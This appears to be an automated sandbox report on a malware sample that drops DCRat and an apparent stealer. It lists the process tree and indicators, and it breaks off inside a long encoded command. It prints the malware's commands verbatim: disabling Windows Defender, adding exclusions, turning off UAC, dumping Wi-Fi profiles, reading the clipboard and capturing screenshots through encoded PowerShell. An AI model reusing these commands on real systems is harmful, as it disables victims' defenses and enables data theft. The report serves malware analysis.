cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5244 powershell.exe 5244 powershell.exe 5244 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5760 System.exe 5760 System.exe 5760 System.exe 5760 System.exe 5760 System.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5760 System.exe 5760 System.exe 5760 System.exe 5760 System.exe 5760 System.exe 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 5760 System.exe 5760 System.exe 5760 System.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
System.exepid process 5760 System.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
Processes:
msedgewebview2.exepid process 2776 msedgewebview2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
SolaraBootstrapper.exetasklist.exetasklist.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.exetasklist.exepowershell.execd57e4c171d6e8f5ea8b8f824a6a7316.exetasklist.exepowershell.exepowershell.exefontsessionruntime.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4976 SolaraBootstrapper.exe Token: SeDebugPrivilege 1264 tasklist.exe Token: SeDebugPrivilege 3232 tasklist.exe Token: SeDebugPrivilege 5160 powershell.exe Token: SeIncreaseQuotaPrivilege 5696 WMIC.exe Token: SeSecurityPrivilege 5696 WMIC.exe Token: SeTakeOwnershipPrivilege 5696 WMIC.exe Token: SeLoadDriverPrivilege 5696 WMIC.exe Token: SeSystemProfilePrivilege 5696 WMIC.exe Token: SeSystemtimePrivilege 5696 WMIC.exe Token: SeProfSingleProcessPrivilege 5696 WMIC.exe Token: SeIncBasePriorityPrivilege 5696 WMIC.exe Token: SeCreatePagefilePrivilege 5696 WMIC.exe Token: SeBackupPrivilege 5696 WMIC.exe Token: SeRestorePrivilege 5696 WMIC.exe Token: SeShutdownPrivilege 5696 WMIC.exe Token: SeDebugPrivilege 5696 WMIC.exe Token: SeSystemEnvironmentPrivilege 5696 WMIC.exe Token: SeRemoteShutdownPrivilege 5696 WMIC.exe Token: SeUndockPrivilege 5696 WMIC.exe Token: SeManageVolumePrivilege 5696 WMIC.exe Token: 33 5696 WMIC.exe Token: 34 5696 WMIC.exe Token: 35 5696 WMIC.exe Token: 36 5696 WMIC.exe Token: SeDebugPrivilege 5924 powershell.exe Token: SeDebugPrivilege 5548 powershell.exe Token: SeDebugPrivilege 6040 powershell.exe Token: SeDebugPrivilege 5780 tasklist.exe Token: SeIncreaseQuotaPrivilege 5696 WMIC.exe Token: SeSecurityPrivilege 5696 WMIC.exe Token: SeTakeOwnershipPrivilege 5696 WMIC.exe Token: SeLoadDriverPrivilege 5696 WMIC.exe Token: SeSystemProfilePrivilege 5696 WMIC.exe Token: SeSystemtimePrivilege 5696 WMIC.exe Token: SeProfSingleProcessPrivilege 5696 WMIC.exe Token: SeIncBasePriorityPrivilege 5696 WMIC.exe Token: SeCreatePagefilePrivilege 5696 WMIC.exe Token: SeBackupPrivilege 5696 WMIC.exe Token: SeRestorePrivilege 5696 WMIC.exe Token: SeShutdownPrivilege 5696 WMIC.exe Token: SeDebugPrivilege 5696 WMIC.exe Token: SeSystemEnvironmentPrivilege 5696 WMIC.exe Token: SeRemoteShutdownPrivilege 5696 WMIC.exe Token: SeUndockPrivilege 5696 WMIC.exe Token: SeManageVolumePrivilege 5696 WMIC.exe Token: 33 5696 WMIC.exe Token: 34 5696 WMIC.exe Token: 35 5696 WMIC.exe Token: 36 5696 WMIC.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 4028 cd57e4c171d6e8f5ea8b8f824a6a7316.exe Token: SeDebugPrivilege 5756 tasklist.exe Token: SeDebugPrivilege 5316 powershell.exe Token: SeDebugPrivilege 5348 powershell.exe Token: SeDebugPrivilege 5868 fontsessionruntime.exe Token: SeIncreaseQuotaPrivilege 3704 WMIC.exe Token: SeSecurityPrivilege 3704 WMIC.exe Token: SeTakeOwnershipPrivilege 3704 WMIC.exe Token: SeLoadDriverPrivilege 3704 WMIC.exe Token: SeSystemProfilePrivilege 3704 WMIC.exe Token: SeSystemtimePrivilege 3704 WMIC.exe Token: SeProfSingleProcessPrivilege 3704 WMIC.exe Token: SeIncBasePriorityPrivilege 3704 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
48a8ee49651a74a74baca1f7c94729e5.exex12.exex11.exex10.exex9.exex8.exex7.exex6.exex5.exex4.exeCheatLauncherV2.exeDCRatBuild.exeBuilt.exeBuilt.execmd.execmd.exedescription pid process target process PID 2596 wrote to memory of 4256 2596 48a8ee49651a74a74baca1f7c94729e5.exe x12.exe PID 2596 wrote to memory of 4256 2596 48a8ee49651a74a74baca1f7c94729e5.exe x12.exe PID 2596 wrote to memory of 4256 2596 48a8ee49651a74a74baca1f7c94729e5.exe x12.exe PID 4256 wrote to memory of 3760 4256 x12.exe x11.exe PID 4256 wrote to memory of 3760 4256 x12.exe x11.exe PID 4256 wrote to memory of 3760 4256 x12.exe x11.exe PID 3760 wrote to memory of 3272 3760 x11.exe x10.exe PID 3760 wrote to memory of 3272 3760 x11.exe x10.exe PID 3760 wrote to memory of 3272 3760 x11.exe x10.exe PID 3272 wrote to memory of 1068 3272 x10.exe cmd.exe PID 3272 wrote to memory of 1068 3272 x10.exe cmd.exe PID 3272 wrote to memory of 1068 3272 x10.exe cmd.exe PID 1068 wrote to memory of 936 1068 x9.exe x8.exe PID 1068 wrote to memory of 936 1068 x9.exe x8.exe PID 1068 wrote to memory of 936 1068 x9.exe x8.exe PID 936 wrote to memory of 1920 936 x8.exe x7.exe PID 936 wrote to memory of 1920 936 x8.exe x7.exe PID 936 wrote to memory of 1920 936 x8.exe x7.exe PID 1920 wrote to memory of 2212 1920 x7.exe x6.exe PID 1920 wrote to memory of 2212 1920 x7.exe x6.exe PID 1920 wrote to memory of 2212 1920 x7.exe x6.exe PID 2212 wrote to memory of 1084 2212 x6.exe x5.exe PID 2212 wrote to memory of 1084 2212 x6.exe x5.exe PID 2212 wrote to memory of 1084 2212 x6.exe x5.exe PID 1084 wrote to memory of 3164 1084 x5.exe x4.exe PID 1084 wrote to memory of 3164 1084 x5.exe x4.exe PID 1084 wrote to memory of 3164 1084 x5.exe x4.exe PID 3164 wrote to memory of 4300 3164 x4.exe Conhost.exe PID 3164 wrote to memory of 4300 3164 x4.exe Conhost.exe PID 3164 wrote to memory of 4300 3164 x4.exe Conhost.exe PID 4300 wrote to memory of 1264 4300 CheatLauncherV2.exe tasklist.exe PID 4300 wrote to memory of 1264 4300 CheatLauncherV2.exe tasklist.exe PID 4300 wrote to memory of 1264 4300 CheatLauncherV2.exe tasklist.exe PID 1264 wrote to memory of 1916 1264 DCRatBuild.exe WScript.exe PID 1264 wrote to memory of 1916 1264 DCRatBuild.exe WScript.exe PID 1264 wrote to memory of 1916 1264 DCRatBuild.exe WScript.exe PID 4300 wrote to memory of 2092 4300 CheatLauncherV2.exe Built.exe PID 4300 wrote to memory of 2092 4300 CheatLauncherV2.exe Built.exe PID 4300 wrote to memory of 4976 4300 CheatLauncherV2.exe cmd.exe PID 4300 wrote to memory of 4976 4300 CheatLauncherV2.exe cmd.exe PID 4300 wrote to memory of 4976 4300 CheatLauncherV2.exe cmd.exe PID 2092 wrote to memory of 2656 2092 Built.exe Built.exe PID 2092 wrote to memory of 2656 2092 Built.exe Built.exe PID 2656 wrote to memory of 1244 2656 Built.exe cmd.exe PID 2656 wrote to memory of 1244 2656 Built.exe cmd.exe PID 2656 wrote to memory of 4604 2656 Built.exe cmd.exe PID 2656 wrote to memory of 4604 2656 Built.exe cmd.exe PID 2656 wrote to memory of 2940 2656 Built.exe cmd.exe PID 2656 wrote to memory of 2940 2656 Built.exe cmd.exe PID 2656 wrote to memory of 1068 2656 Built.exe cmd.exe PID 2656 wrote to memory of 1068 2656 Built.exe cmd.exe PID 2656 wrote to memory of 5900 2656 Built.exe cmd.exe PID 2656 wrote to memory of 5900 2656 Built.exe cmd.exe PID 2656 wrote to memory of 5984 2656 Built.exe WMIC.exe PID 2656 wrote to memory of 5984 2656 Built.exe WMIC.exe PID 5984 wrote to memory of 1264 5984 cmd.exe tasklist.exe PID 5984 wrote to memory of 1264 5984 cmd.exe tasklist.exe PID 5900 wrote to memory of 3232 5900 cmd.exe tasklist.exe PID 5900 wrote to memory of 3232 5900 cmd.exe tasklist.exe PID 2656 wrote to memory of 3956 2656 Built.exe cmd.exe PID 2656 wrote to memory of 3956 2656 Built.exe cmd.exe PID 2656 wrote to memory of 2384 2656 Built.exe cmd.exe PID 2656 wrote to memory of 2384 2656 Built.exe cmd.exe PID 2656 wrote to memory of 1940 2656 Built.exe cmd.exe -
System policy modification 1 TTPs 6 IoCs
Processes:
fontsessionruntime.exeSystem.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fontsessionruntime.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" fontsessionruntime.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" fontsessionruntime.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" System.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" System.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" System.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 4716 attrib.exe 5928 attrib.exe 5968 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\48a8ee49651a74a74baca1f7c94729e5.exe"C:\Users\Admin\AppData\Local\Temp\48a8ee49651a74a74baca1f7c94729e5.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Users\Admin\AppData\Local\Temp\x12.exe"C:\Users\Admin\AppData\Local\Temp\x12.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Users\Admin\AppData\Local\Temp\x11.exe"C:\Users\Admin\AppData\Local\Temp\x11.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Users\Admin\AppData\Local\Temp\x10.exe"C:\Users\Admin\AppData\Local\Temp\x10.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Users\Admin\AppData\Local\Temp\x9.exe"C:\Users\Admin\AppData\Local\Temp\x9.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\x8.exe"C:\Users\Admin\AppData\Local\Temp\x8.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Users\Admin\AppData\Local\Temp\x7.exe"C:\Users\Admin\AppData\Local\Temp\x7.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Users\Admin\AppData\Local\Temp\x6.exe"C:\Users\Admin\AppData\Local\Temp\x6.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\x5.exe"C:\Users\Admin\AppData\Local\Temp\x5.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\x4.exe"C:\Users\Admin\AppData\Local\Temp\x4.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Users\Admin\AppData\Local\Temp\CheatLauncherV2.exe"C:\Users\Admin\AppData\Local\Temp\CheatLauncherV2.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\agentInto\ygzWE.vbe"13⤵
- Checks computer location settings
PID:1916 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\agentInto\pR9EprN9daTFn7S7o.bat" "14⤵PID:4616
-
C:\agentInto\fontsessionruntime.exe"C:\agentInto\fontsessionruntime.exe"15⤵
- Modifies WinLogon for persistence
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:5868 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hWqljiZbNB.bat"16⤵PID:5516
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:217⤵PID:5408
-
C:\Program Files\Microsoft Office 15\ClientX64\System.exe"C:\Program Files\Microsoft Office 15\ClientX64\System.exe"17⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- System policy modification
PID:5760 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"12⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"13⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"14⤵PID:1244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'15⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5160 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"14⤵PID:4604
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5924 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""14⤵
- Hide Artifacts: Hidden Files and Directories
PID:2940 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"15⤵
- Views/modifies file attributes
PID:4716 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"14⤵PID:1068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'15⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5548 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"14⤵
- Suspicious use of WriteProcessMemory
PID:5900 -
C:\Windows\system32\tasklist.exetasklist /FO LIST15⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3232 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"14⤵
- Suspicious use of WriteProcessMemory
PID:5984 -
C:\Windows\system32\tasklist.exetasklist /FO LIST15⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1264 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"14⤵PID:3956
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName15⤵
- Suspicious use of AdjustPrivilegeToken
PID:5696 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"14⤵PID:2384
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"14⤵PID:1940
-
C:\Windows\system32\tasklist.exetasklist /FO LIST15⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5780 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"14⤵PID:4360
-
C:\Windows\system32\tree.comtree /A /F15⤵PID:6108
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"14⤵PID:4184
-
C:\Windows\system32\netsh.exenetsh wlan show profile15⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5592 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"14⤵PID:5916
-
C:\Windows\system32\systeminfo.exesysteminfo15⤵
- Gathers system information
PID:2496 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"14⤵PID:5892
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath15⤵PID:3000
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="14⤵PID:5972
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgB